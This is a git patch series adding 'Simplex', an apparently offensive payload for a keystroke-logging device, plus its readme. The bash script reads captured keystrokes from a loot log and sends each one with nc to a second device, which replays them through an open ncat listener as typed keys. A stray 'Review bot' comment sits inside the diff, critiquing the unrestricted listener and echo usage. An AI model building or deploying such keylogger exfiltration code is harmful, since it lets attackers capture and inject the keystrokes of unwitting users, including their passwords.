From c5241e4c781157402936fbb9960596065535b7c3 Mon Sep 17 00:00:00 2001
From: cribb-it <24548670+cribb-it@users.noreply.github.com>
Date: Tue, 18 Mar 2025 19:35:15 +0000
Subject: [PATCH 1/6] Remove placeholder
---
payloads/library/exfiltration/placeholder | 0
1 file changed, 0 insertions(+), 0 deletions(-)
delete mode 100644 payloads/library/exfiltration/placeholder
diff --git a/payloads/library/exfiltration/placeholder b/payloads/library/exfiltration/placeholder
deleted file mode 100644
index e69de29..0000000
From c79f8e9b41b743c3784c15323a29734d76f5f92d Mon Sep 17 00:00:00 2001
From: cribb-it <24548670+cribb-it@users.noreply.github.com>
Date: Tue, 18 Mar 2025 19:35:59 +0000
Subject: [PATCH 2/6] New Payload
---
.../exfiltration/Multi_Net_Simplex/simplex | 62 +++++++++++++++++++
1 file changed, 62 insertions(+)
create mode 100644 payloads/library/exfiltration/Multi_Net_Simplex/simplex
diff --git a/payloads/library/exfiltration/Multi_Net_Simplex/simplex b/payloads/library/exfiltration/Multi_Net_Simplex/simplex
new file mode 100644
index 0000000..0bef253
--- /dev/null
+++ b/payloads/library/exfiltration/Multi_Net_Simplex/simplex
@@ -0,0 +1,62 @@
+#!/bin/bash
+trap "kill 0" EXIT
+###########################################
+# Title: Simplex
+# Author: Cribbit
+# Description: Send key from one croc to another
+# Target: Multi
+###########################################
+
+MATCH croc_send
+MATCH croc_listen
+
+LED SETUP
+QUACK DELAY 200
+# variables
+croc2=192.168.1.100
+port=8080
+# fixed variables
+charlog=/root/loot/croc_char.log
+rawlog=/root/loot/croc_raw.log
+LED SPECIAL
+# if listener set up netcat
+if [[ "$LOOT" == "croc_listen" ]]; then
+ # Set up a command for nc to send to QUACK.
+ CMD="while true; do read i && QUACK KEYCODE \$i ; done"
+ # set nc to run in its own process
+ ncat -lvnk -p $port -c "$CMD" &
+ # give nc time to start
+ sleep 1
+fi
+
+LED ATTACK
+# get the current line count
+point=$(wc -l "$rawlog" | awk {'print $1'})
+# forever loop
+while :
+do
+ # if sender
+ if [[ "$LOOT" == "croc_send" ]]; then
+ # get the current line count
+ cnt=$(wc -l "$rawlog" | awk {'print $1'})
+ # compaire the first with the secound
+ if [ "$cnt" -ne "$point" ]; then
+ # get the differnce
+ dif=$((cnt-point))
+ while read -r line; do
+ key=${line:0:8}
+ echo $key -n | nc -w 2 $croc2 $port
+ done <<< "$(tail --lines $dif $rawlog)"
+ # reset count
+ point=$cnt
+ fi
+ fi
+ # should we exit
+ if tail -c 6 "$charlog" | grep -q 'exit'; then
+ sleep 1
+ break;
+ fi
+done
+
+LED FINISH
+sleep 1
From 0651c50c30c53e159d0ade2bdbbe27dd63cf42f1 Mon Sep 17 00:00:00 2001
From: cribb-it <24548670+cribb-it@users.noreply.github.com>
Date: Tue, 18 Mar 2025 19:36:30 +0000
Subject: [PATCH 3/6] Read Me
---
.../exfiltration/Multi_Net_Simplex/readme.md | 45 +++++++++++++++++++
1 file changed, 45 insertions(+)
create mode 100644 payloads/library/exfiltration/Multi_Net_Simplex/readme.md
diff --git a/payloads/library/exfiltration/Multi_Net_Simplex/readme.md b/payloads/library/exfiltration/Multi_Net_Simplex/readme.md
new file mode 100644
index 0000000..4a08fd4
--- /dev/null
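Review bot: The `croc_listen` branch binds `ncat -lvnk -p $port` on every interface with no source restriction and hands each received line, unquoted, to `QUACK KEYCODE \$i`, so any host that can reach the port can type on the machine the listening croc is attached to. Restrict the peer and quote the port, e.g. `ncat -lvnk --allow "$croc1" -p "$port" -c "$CMD" &` with a new `croc1` variable holding the sender's address, and have the loop in `CMD` drop any line that is not in the keycode form the sender emits before it calls QUACK. On the sender side `echo $key -n` puts `-n` after the operand, so echo prints it as text instead of treating it as an option; `printf '%s\n' "$key"` sends only the key. The two `wc -l "$rawlog"` reads also assume the log already exists; if it does not, `[ "$cnt" -ne "$point" ]` gets an empty operand and errors on every pass of the loop.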
+++ b/payloads/library/exfiltration/Multi_Net_Simplex/readme.md
@@ -0,0 +1,45 @@
+# :phone: Simplex
+- Author: Cribbit
+- Version: 1.0
+- Target: Mutli OS
+- Category: General
+- Attackmode: None - Needs wifi connection
+
+## :mag: Match
+croc_send
+croc_listen
+
+## :book: Description
+Sends keystrokes from one croc to another.
+
+This is a PoC basicly me playing with netcat. It's quite slow!!
+
+### Listener
+On the listener use ‘croc_listen’ this will set up. This will create a netcat listener on the port and pass the incoming traffic to QUACK KEYCODE.
+
+### Sender
+On the sending croc set the croc2 variable to the IP address of the listener croc i.e. `croc2=192.168.1.100`
+Use ‘croc_send’ this will check the raw log and send new key press over nc to the other croc.
+
+### To stop
+Type `exit` on the attached keyboards.
+
+### Note
+Set the port variable to an unused port i.e. ‘port=8080’
+
+This is a proof of concept. As there are some limitations due to the way the QUACK command works.
+As by default, it releases all key(s) after it send a keycode.
+So, you may have issues with command like `CTRL + C` it may do:
+CTRL
+CTRL + C
+CTRL
+If you hit CTRL then the C then let go of C then CTRL.
+You could fix this by modifying the QUACK file. If you look for the function `run_ducky_line(context, line, lang_file)`.
+Then look for the line `elif cmd == 'KEYCODE':` then 6'ish line down `hidg_write(elements,release_key)`
+then change `release_key` to `False` or set the `release_key` variable to false `release_key = False` before the hidg_write line.
+
+
+## :placard: Change Log
+| Version | Changes |
+| ------- | --------------- |
+| 1.0 | Initial release |
\ No newline at end of file
From cd65a993659eee5c4252c466d6aef49328096f90 Mon Sep 17 00:00:00 2001
From: cribb-it <24548670+cribb-it@users.noreply.github.com> Date: Tue, 18 Mar 2025 19:40:23 +0000 Subject: [PATCH 4/6] Update Readme --- payloads/library/exfiltration/Multi_Net_Simplex/readme.md | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/payloads/library/exfiltration/Multi_Net_Simplex/readme.md b/payloads/library/exfiltration/Multi_Net_Simplex/readme.md index 4a08fd4..6837f5b 100644 --- a/payloads/library/exfiltration/Multi_Net_Simplex/readme.md +++ b/payloads/library/exfiltration/Multi_Net_Simplex/readme.md @@ -2,7 +2,7 @@ - Author: Cribbit - Version: 1.0 - Target: Mutli OS -- Category: General +- Category: Exfiltration - Attackmode: None - Needs wifi connection ## :mag: Match @@ -30,11 +30,13 @@ Set the port variable to an unused port i.e. ‘port=8080’ This is a proof of concept. As there are some limitations due to the way the QUACK command works. As by default, it releases all key(s) after it send a keycode. So, you may have issues with command like `CTRL + C` it may do: +``` CTRL CTRL + C CTRL +``` If you hit CTRL then the C then let go of C then CTRL. -You could fix this by modifying the QUACK file. If you look for the function `run_ducky_line(context, line, lang_file)`. +You could fix this by modifying the QUACK file. If you look for the function `run_ducky_line(context, line, lang_file)`.
Then look for the line `elif cmd == 'KEYCODE':` then 6'ish line down `hidg_write(elements,release_key)` then change `release_key` to `False` or set the `release_key` variable to false `release_key = False` before the hidg_write line. From b76e04d0303d3e4504eb0eb909937c6c13313cb7 Mon Sep 17 00:00:00 2001 From: cribb-it <24548670+cribb-it@users.noreply.github.com> Date: Tue, 18 Mar 2025 19:42:19 +0000 Subject: [PATCH 5/6] Bad Spelling --- payloads/library/exfiltration/Multi_Net_Simplex/readme.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/payloads/library/exfiltration/Multi_Net_Simplex/readme.md b/payloads/library/exfiltration/Multi_Net_Simplex/readme.md index 6837f5b..19ec0ac 100644 --- a/payloads/library/exfiltration/Multi_Net_Simplex/readme.md +++ b/payloads/library/exfiltration/Multi_Net_Simplex/readme.md @@ -12,7 +12,7 @@ croc_listen ## :book: Description Sends keystrokes from one croc to another. -This is a PoC basicly me playing with netcat. It's quite slow!! +This is a PoC basically me playing with netcat. It's quite slow!! ### Listener On the listener use ‘croc_listen’ this will set up. This will create a netcat listener on the port and pass the incoming traffic to QUACK KEYCODE. From 530577d112e50984d9d02105d09dae60eda78dc3 Mon Sep 17 00:00:00 2001 From: cribb-it <24548670+cribb-it@users.noreply.github.com> Date: Sun, 23 Mar 2025 13:12:21 +0000 Subject: [PATCH 6/6] txt 4 Peaks --- .../exfiltration/Multi_Net_Simplex/{simplex => simplex.txt} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename payloads/library/exfiltration/Multi_Net_Simplex/{simplex => simplex.txt} (100%) diff --git a/payloads/library/exfiltration/Multi_Net_Simplex/simplex b/payloads/library/exfiltration/Multi_Net_Simplex/simplex.txt similarity index 100% rename from payloads/library/exfiltration/Multi_Net_Simplex/simplex rename to payloads/library/exfiltration/Multi_Net_Simplex/simplex.txt